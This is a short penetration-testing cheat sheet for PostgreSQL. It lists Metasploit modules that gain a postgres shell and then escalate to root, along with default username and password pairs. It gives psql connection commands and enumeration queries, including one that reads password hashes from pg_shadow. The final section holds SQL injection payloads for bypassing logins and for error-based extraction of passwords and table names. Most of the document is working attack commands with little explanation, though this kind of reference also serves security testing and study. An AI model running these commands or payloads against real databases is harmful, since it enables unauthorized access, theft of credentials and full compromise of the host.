5432 - Pentesting postgres
PostgreSQL is an open-source relational database management system (RDBMS) that is widely used for managing and storing data. It is known for its reliability, stability, and robust feature set, and it is used by organizations of all sizes, from small startups to large enterprise businesses.
nmap
metasploit
metasploit - version
metasploit - postgres - 8.3.1 + udev_netlinkuse exploit/linux/postgres/postgres_payload
|-> getuid => postgres
use exploit/linux/local/udev_netlink
|-> getuid => root
default users
user | pass |
---|---|
postgres | postgres |
postgres | password |
connect
local
local docker remotepsql -h $IP -U postgres -W
psql -h $IP -U postgres -d <database>
psql -h <host> -p <port> -U postgres -W -d <database>
commands
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles
# Get current user
Select user;
# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+
#List databases
SELECT datname FROM pg_database;
#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;
# Get languages
SELECT lanname,lanacl FROM pg_language;
# Show installed extensions
SHOW rds.extensions;
# Get history of commands executed
\s
sql injection
basic
x' or 1=1 -- x
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
x'; SELECT CAST(password AS DATE) FROM users; -- x
x'; SELECT cast(cast(json_agg(table_name) as varchar) as boolean) FROM information_schema.tables; -- x